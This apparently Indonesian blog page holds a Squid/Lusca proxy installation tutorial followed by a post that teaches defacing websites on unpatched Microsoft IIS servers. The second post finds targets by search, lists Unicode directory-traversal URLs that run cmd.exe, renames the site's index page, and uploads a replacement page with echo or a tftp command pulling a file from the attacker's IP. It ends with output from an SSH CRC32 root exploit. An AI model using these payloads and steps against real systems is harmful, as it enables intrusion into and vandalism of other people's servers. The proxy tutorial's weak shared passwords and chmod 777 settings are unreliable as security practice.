Jumat, 08 Juni 2012

SQUID PROXY DENGAN UBUNTU SERVER 11.04 32/64 BIT

Hidupkan PC Calon Proxy Server
Masukkan ‘CD Ubuntu Server’ Ke CDROM
Booting dari CDROM
Pilih language English, Enter
Pilih Install Ubuntu Server, Enter
Tekan enter pada ‘Choose Language’ English
Pilih United States
‘Detect Keyboard Layout Pilih ‘No’
Pada Ubuntu ‘Installer Main Menu’ pilih USA
Pada ‘Keyboard Layout’ Pilih USA
Pilih ‘Continue’ pada ‘Configure The Network’
Pilih ‘Configure Network Manually’
Isi IP Address dengan 192.168.11.11 pilih ‘Continue’, lalu tekan Enter
Netmask 255.255.255.0 pilih ‘Continue’, lalu Enter
Pada Gateway sudah terdapat angka ‘192.168.11.1’, biarkan saja terus Tab Pilih ‘Continue’
Pada Name Server Addresses sudah terdapat angka ‘192.168.11.1’ abaikan dan Tab pilih ‘Continue’, lalu enter
Hotsname diisi dengan : anjelanet (terserah anda) terus pilih continue enter
Domain Name: kosongkan saja, pilih ‘Continue’ dan tekan enter
Pada pilihan ‘Configure The Clock’ pilih ‘Select From Worldwide List’ terus cari Jakarta, lalu tekan Enter
Pada menu ‘Partition Disk’ pilih ‘Manually’
(Penulis menggunakan 2 Harddisk 250 GB & 500 GB 7200 RPM, RAM 2 GB PC6400, HDD 500 GB dipersiapkan untuk men-cache Video Streaming & MP3. Jika HDD & RAM anda berbeda sesuaikan dengan kebutuhan, Pola Partition Nomor 1 & 3 tutorial ini mohon tidak di ubah, cukup penyesuaian pada option RAM saja)
Selanjutnya Jika menggunakan Harddisk bekas pakai, Langkahnya kita hapus partisi yang ada terlebih dahulu. Pilih Directory Partition yang akan dihapus, tekan enter dan pilih Delete The Partition (ULANGI PERINTAH INI UNTUK SEMUA PARTISI YG TERSISA).
Jika telah selesai pilih ‘Guided Partitioning’, kemudian pilih ‘Manually’ arahkan pada FREE SPACE. (UNTUK HARDDISK KOSONG LANGSUNG KE LANGKAH INI).
1. Arahkan ke FREE SPACE HDD1 Pilih Create New Partition, Enter
- Besar Partition I adalah 256 MB, Jadikan sebesar itu. Pilih Continue, Enter (Usahakan untuk tidak merubah besaran Partisi Harddisk ini)
- Pilih Primary, Enter
- Pilih Beginning, Enter
- Pada pilihan ‘Use As’ = Ext4, Enter
- Jika muncul option ‘Format The Partition’ tekan enter untuk memilih ‘Yes, Format it’
- Mount point = /boot
- Mount options pilih ‘Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard
- Bootable flag = on
- Pilih ‘Done Setting Up The Partition’
2. Arahkan ke FREE SPACE HDD1 Pilih Create New Partition, Enter
- Besar Partition II adalah 30 GB (Sesuaikan kapasitas HDD anda, minimal 10 GB)
- Pilih Primary, Enter
- Pilih Beginning, Enter
- Pada pilihan ‘Use As’ = Ext4
- Jika muncul option ‘Format The Partition’ tekan enter untuk memilih ‘Yes, Format it’
- Mount point = /
- Mount options pilih ‘Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard
- Pilih ‘Done Setting Up The Partition’




3. Arahkan ke FREE SPACE HDD1 Pilih Create New Partition, Enter
- Besaran Partisi III adalah 4 GB (RAM 2 GB)
(Untuk RAM 1 GB Isikan Partisi III sebesar 2 GB. Rumus = RAM x 2 = Besar Partisi SWAP AREA)
- Pilih Primary, Enter
- Pilih Beginning, Enter
- Pada pilihan ‘Use As’ = Swap Area
- Pilih ‘Done Setting Up The Partition’
4. Arahkan ke FREE SPACE HDD1 Pilih Create New Partition, Enter
- Besar Partition IV adalah keseluruhan sisa HDD 1 yang masih FREE SPACE (dalam hal ini Free Space HDD 1 saya 215,8 GB)
- Pilih Primary, Enter
- Jika muncul option ‘Format The Partition’ tekan enter untuk memilih ‘Yes, Format it’
- Pada pilihan ‘Use As’ untuk Ubuntu Server 32/Bit = ReiserFS, untuk Ubuntu Server 64/Bit Pada pilihan ‘Use As’ = BtrFS
- Pada Mount point = Enter dan pilih Manually, ‘/home ubah menjadi /cache1’
- Mount options untuk Ubuntu Server 32/Bit pilih ‘Notail & Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard,, untuk Ubuntu Server 64/Bit Mount options pilih ‘Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard.
- Pilih ‘Done Setting Up The Partition’

(PERHATIAN : JIKA MENGGUNAKAN 1 HARDDISK, ABAIKAN LANGKAH 5 & 6 BERIKUT INI)

5. Arahkan ke FREE SPACE HDD2 Create New Partition, Enter
- Besar Partition V adalah 300 GB (Sesuaikan kapasitas HDD anda)
- Pilih Primary, Enter
- Pada pilihan ‘Use As’ untuk Ubuntu Server 32/Bit = ReiserFS, untuk Ubuntu Server 64/Bit Pada pilihan ‘Use As’ = BtrFS
- Jika muncul option ‘Format The Partition’ tekan enter untuk memilih ‘Yes, Format it’
- Pada Mount point = Enter dan pilih Manually, ‘/home ubah menjadi /cache2’
- Mount options untuk Ubuntu Server 32/Bit pilih ‘Notail &Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard, untuk Ubuntu Server 64/Bit Mount options pilih ‘Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard.
- Pilih ‘Done Setting Up The Partition’
6. Arahkan ke FREE SPACE HDD2 Create New Partition, Enter
- Besar Partition V adalah 200 GB (Sesuaikan kapasitas HDD anda)
- Pilih Primary, Enter
- Pada pilihan ‘Use As’ untuk Ubuntu Server 32/Bit = ReiserFS, untuk Ubuntu Server 64/Bit Pada pilihan ‘Use As’ = BtrFS
- Jika muncul option ‘Format The Partition’ tekan enter untuk memilih ‘Yes, Format it’
- Pada Mount point = Enter dan pilih Manually, ‘/home ubah menjadi /cache3’
- Mount options untuk Ubuntu Server 32/Bit pilih ‘Notail &Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard, untuk Ubuntu Server 64/Bit Mount options pilih ‘Noatime’ dengan menekan tombol ‘SPACE’ pada keyboard.
- Pilih ‘Done Setting Up The Partition’

Pilih Finish Partitioning And Write Changes To Disk, tekan Enter
Pada pilihan Write The Changes To Disk pilih Yes, tekan Enter
Pada Full Name For The New User isi dg anjelanet, pilih continue & tekan Enter
Pada Username For Your Account isi dg anjelanet, terus continue & tekan Enter
Pada a password For The New User isi dg anjelanet, terus continue & tekan Enter
Pada Re-Enter Password To Verify isi dg anjelanet, terus continue & tekan Enter
Jika muncul pilihan Use Weak Password pilih Yes, tekan Enter
Pada pilihan Encrypt Your Home Directory pilih ‘No’, tekan Enter
Pada pilihan HTTP Proxy Information dikosongkan saja, pilih Continues, tekan Enter
Pada saat ‘Configuration apt’ mencapai 23% tekan enter, juga pada 72% tekan Enter
Pada saat pilihan updating pilih ‘No Automatic Update’
Pada Choose Software To Install pilih ‘OpenSSH Server’ dengan menekan tombol ‘SPACE’ pada keyboard, selanjutnya pilih Continues, tekan Enter
Pada Pilihan ‘Install GRUB Loader’ pilih Yes
Pada saat ‘Ejecting CD Ubuntu Server Installer’ ambil CD-nya tutup kembali CDROM dan pilih pilih Continues

‘FINISH THE INSTALLATION & CPU ON PROCEED REBOOT, DON’T TOUCH ANYTHING’
‘NOW WAKE UP… PROXY SERVER UBUNTU IS READY FOR NEXT STAGE’

Login pada Ubuntu Server (Isikan sesuai User & Password anda)
- Login as : anjelanet
- Password : anjelanet
Untuk proses agar bisa Login di @root :
- Ketikan perintah : sudo su – dan tekan enter
- Isikan Password : anjelanet
- Ketikan perintah : passwd dan tekan enter
- Isikan Password Baru : anjelanet
- Isikan kembali Password Baru : anjelanet
- Reboot PC dengan mengetikan perintah = reboot –h now
Hubungkan Kabel UTP atau Kabel LAN dari PC ke Routerboard (Mikrotik) pada ether3 (terserah sisa Port Mikrotik anda). Jenis Kabel LAN bisa Type ‘Straight’ atau Type ‘Cross’, terserah anda.
Pada Mikrotik masuk dengan Winbox pilih interface ether3 (terserah sisa Port Mikrotik anda) ganti nama ‘ether3’ menjadi ‘Proxy’ dan pilih ‘OK’
Pilih Terminal dan masukkan script berikut :

/ip address
add address=192.168.11.1/24 network=192.168.11.0 broadcast=192.168.11.255 interface= Proxy

Cek Koneksi PC Proxy server dengan Mikrotik dari Terminal Mikrotik, ketikan perintah berikut :

Ping 8.8.8.8

Jika berjalan dengan baik Ping - nya, PC Proxy server dengan Mikrotik telah terhubung dengan baik.
PERSIAPAN Instalasi Squid download dahulu dari Web Browser File squid.conf, sysctl.conf, squid, storeurl DISINI.
Cek terlebih dahulu Type dan Komponen PC Proxy Server anda, selanjutnya masuk ke http://en.gentoo-wiki.com/wiki/Safe_Cflags, tentukan CHOST, CFLAGS & CXXFLAGS PC Proxy Server anda untuk proses ‘Compile’ . Simpan type CHOST, CFLAGS & CXXFLAGS di Notepad.
Untuk memudahkan proses selanjutnya adalah me-remote PC Proxy Server dari PC lain dalam satu jaringan, menggunakan WINSCP dan PUTTY. Jika belum punya silahkan download DISINI.
Install WINSCP dan PUTTY
Buka WINSCP, pada Hostname masukkan IP Address PC Proxy Server 192.168.11.11, pada User masukkan ‘root’ (tanpa tanda petik) dan pada Password isikan ‘anjelanet’ (tanpa tanda petik). Untuk memudahkan proses, pilih ‘Save’ kemudian pilih ‘Login’. Jika muncul pilihan, pilih ‘Yes’ atau ‘Update’
Setelah Login WINSCP, pada toolbarnya ada pilihan ‘Open session in PUTTY’, pilih saja untuk membuka PUTTY, atau bisa juga dengan menekan Ctrl+P.
Pada Login PUTTY, masukkan Password ‘anjelanet’ (tanpa tanda petik)
Sekarang anda telah masuk dalam Login PUTTY, untuk melakukan proses Update terhadap PC Proxy Server sebagai tahap berikutnya.
Pada PUTTY, masukkan perintah berikut ini satu per satu, (Jika nanti pada proses updating terdapat pilihan ‘Y/N’ pilih ‘Y’ dan Enter) :

sudo apt-get update
sudo apt-get install squid
sudo apt-get install squid squidclient squid-cgi
sudo apt-get install gcc
sudo apt-get install build-essential
sudo apt-get install sharutils
sudo apt-get install ccze
sudo apt-get install libzip-dev
sudo apt-get install automake1.9
sudo apt-get install acpid
sudo apt-get install multitail

Setelah selesai Proses updating, langkah berikutnya dari PUTTY download file LUSCA_FMI (Credit To NEO FMI), masukkan perintah berikut ini :

wget http://anjelanet.googlecode.com/files/LUSCA_FMI.tar.gz

Selesai proses download, masukkan perintah :

tar xzvf LUSCA_FMI.tar.gz

kemudian :

cd LUSCA_FMI/

Jika anda menggunakan Ubuntu Server 64/bit, masukkan perintah :

make distclean

Proses Compile (Buka Notepad hasil CHOST, CFLAGS & CXXFLAGS tadi :
- Untuk Ubuntu 32/bit :
1. Masukkan CHOST anda, tekan enter
2. Masukkan CFLAGS anda , tekan enter
3. Masukkan CXXFLAGS anda, tekan enter
4. Masukkan kode Compile berikut ini :

./configure --prefix=/usr --exec_prefix=/usr --bindir=/usr/sbin --sbindir=/usr/sbin --libexecdir=/usr/lib/squid --sysconfdir=/etc/squid \
--localstatedir=/var/spool/squid --datadir=/usr/share/squid --enable-http-gzip --enable-async-io=24 --with-aufs-threads=24 --with-pthreads --enable-storeio=aufs \
--enable-linux-netfilter --enable-arp-acl --enable-epoll --enable-removal-policies=heap --with-aio --with-dl --enable-snmp \
--enable-delay-pools --enable-htcp --enable-cache-digests --disable-unlinkd --enable-large-cache-files --with-large-files \
--enable-err-languages=English --enable-default-err-language=English --with-maxfd=65536

Tekan Enter

- Untuk Ubuntu 64/bit :
1. Masukkan CHOST anda, tekan enter
2. Masukkan CFLAGS anda, tekan enter
3. Masukkan CXXFLAGS anda, tekan enter
4. Masukkan kode Compile berikut ini :

./configure --prefix=/usr --exec_prefix=/usr --bindir=/usr/sbin --sbindir=/usr/sbin --libexecdir=/usr/lib/squid --sysconfdir=/etc/squid \
--localstatedir=/var/spool/squid --datadir=/usr/share/squid --enable-http-gzip --enable-async-io=24 --with-aufs-threads=24 --with-pthreads --enable-storeio=aufs \
--enable-linux-netfilter --enable-arp-acl --enable-epoll --enable-removal-policies=heap --with-aio --with-dl --enable-snmp \
--enable-delay-pools --enable-htcp --enable-cache-digests --disable-unlinkd --enable-large-cache-files --with-large-files \
--enable-err-languages=English --enable-default-err-language=English --with-maxfd=65536
Tekan Enter

Selanjutnya masukkan berikut :

make

dan berikutnya :

sudo make install

Dari WINSCP copy paste file Squid.conf, Storeurl, Squid, & sysctl : (INGAT PADA WINSCP SISI KIRI ADALAH KOMPUTER YG DIPAKAI UNTUK PROSES REMOTE & SISI KANAN WINSCP ADALAH KOMPUTER PROXY SERVER YANG DIREMOTE)

- File sysctl.pl Copy & Paste ke Directory /etc/
- File squid.conf & storeurl ke Directory /etc/squid/
- File squid ke Directory /etc/init.d/

Kemudian pada buka file squid.conf pada Directory /etc/squid/ yang di copy paste tadi, edit dan sesuaikan bagian ini :

cache_dir aufs /cache1 27300 64 256
cache_dir aufs /cache2 27300 64 256
cache_dir aufs /cache3 27300 64 256

cache_dir aufs /cache1, cache_dir aufs /cache2, cache_dir aufs /cache3 menunjukkan partisi HDD yang akan difungsikan untuk menyimpan cache.

Sesuaikan ‘IP Address Network Mikrotik’ anda, (Ingat bukan IP Address Mikrotik & IP Address Gateway Mikrotik)

acl localnet src 192.168.1.0/24

INGAT!!!!
KESALAHAN PADA cache_dir & acl localnet ‘squid.conf’, MENYEBABKAN ANDA TIDAK DAPAT MENYELESAIKAN PROSES SELANJUTNYA, SEHINGGA MUNCUL PESAN ‘FATAL BUNGLED LINE……’
JADI PERHATIKAN BAIK-BAIK ‘squid.conf’ ANDA.

Selanjutnya kita memberikan Permission untuk Folder Directory Cache, ketikan perintah :

chown proxy:proxy /cache
chmod 777 /cache
chown proxy:proxy /etc/squid/storeurl.pl
chmod 777 /etc/squid/storeurl.pl

karena saya menggunakan Tiga Directory cache, maka perintah yang saya masukkan adalah :

chown proxy:proxy /cache1
chown proxy:proxy /cache2
chown proxy:proxy /cache3
chmod 777 /cache1
chmod 777 /cache2
chmod 777 /cache3
chown proxy:proxy /etc/squid/storeurl.pl
chmod 777 /etc/squid/storeurl.pl

Berikutnya folder-folder swap/cache di dalam folder cache ditentukan dengan perintah :

squid -f /etc/squid/squid.conf -z

Selesai Proses Installasi LUSCA_FMI dengan Squid Proxy High Performance, perintahkan untuk reboot squid anda dengan memasukkan perintah :

sudo /etc/init.d/squid restart

Terakhir, reboot PC Ubuntu Proxy Server anda dengan perintah :

Reboot -h now

Jika Anda Mengikuti Step By Step Proses Instalasi Di Atas Maka Untuk Mematikan PC Ubuntu Proxy Server Anda, Cukup Dengan Menekan Tombol Power PC Ubuntu Proxy Server Anda (Jangan Ditahan, Cukup Tekan Sekali Dalam Hitungan Detik), dimana anda sudah menginstall tools ACPID dengan perintah ‘sudo apt-get install acpid’.

Selanjutnya adalah mengaktifkan PC Proxy sebagai ‘Server Cache’ untuk komputer2 yang lain. Caranya setting mikrotik dari Winbox. Dari Terminal ketik berikut :

/ip fi addr
add name=Local address=192.168.1.0/24
add name=Proxy address=192.168.11.0/24

/ip fi nat
add chain=dstnat action=dst-nat to-addresses=192.168.11.11 to-ports=3128 protocol=tcp \
src-address-list=Local dst-address-list=!Proxy in-interface=Local \
dst-port=80,81,8080,3128 commet="TRANSPARENT PROXY"

add chain=srcnat action=masquerade out-interface=pppoe-speedy1 comment="MASQUARADE"
add chain=srcnat action=masquerade out-interface=Modem

add chain=dstnat action=redirect to-ports=53 protocol=udp dst-port=53 comment="DNS"
add chain=dstnat action=redirect to-ports=53 protocol=tcp dst-port=53

add chain=dstnat action=dst-nat to-addresses=192.168.11.11 to-ports=22 protocol=tcp \
in-interface=pppoe-speedy1 dst-port=22 comment="DMZ"
add chain=dstnat action=dst-nat to-addresses=192.168.3.1 to-ports=80 protocol=tcp \
in-interface=pppoe-speedy1 dst-port=8181

/ip fi addr
add name=Local address=192.168.1.0/24
add name=Proxy address=192.168.11.0/24

/ip fi ma
add chain=forward action=mark-connection new-connection-mark="HIT" passthrough=yes \
protocol=tcp in-interface=Proxy out-interface=Local src-port=3128 dscp=12 comment="PROXY-HIT"

Keterangan :
!Proxy = Membaca IP address Proxy di IP-Firewall-IP Address List
Local = Interface mikrotik yang mengarah ke jaringan Lokal
pppoe-speedy1 = Interface mikrotik yang mengarah ke jaringan internet
Modem = Interface mikrotik yang mengarah ke modem bridge’

‘SESUAIKAN DENGAN KONDISI JARINGAN ANDA’

Sampai disini, anda telah berhasil membangun jaringan dengan menggunakan proxy server sendiri. Selanjutnya tinggal mengembangkan script pada Routerboard/mikrotik untuk pengaturan Mangle dan Bandwidth Management pada opsi ‘Queue’. Tutorial mengenai hal tersebut sudah sangat banyak sekali di internet.
Read More

Senin, 04 Juni 2012

Deface Website yang menggunakan Microsoft IIS

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah 
kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg 
bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:

http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "http://www.targethost.com"
· Bagian exploit string, yaitu "/scripts/..%255c..%255c"
· Bagian folder, yaitu "/winnt/system32/"
· Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini 
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian : 
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian command yaitu, cmdku.exe?/c+echo+
  • Bagian HTML
  • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya : 
  • http://www.targethost.com/scripts/..%255c..%255c
    /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
    up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian : 
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian folder, yaitu /winnt/system32/
  • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
  • Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

--------------------------------------------END--------------------------------------------------

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"

Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small - SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h - stack_buf distance
(34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0x0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0x0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0x0010# SEGV #
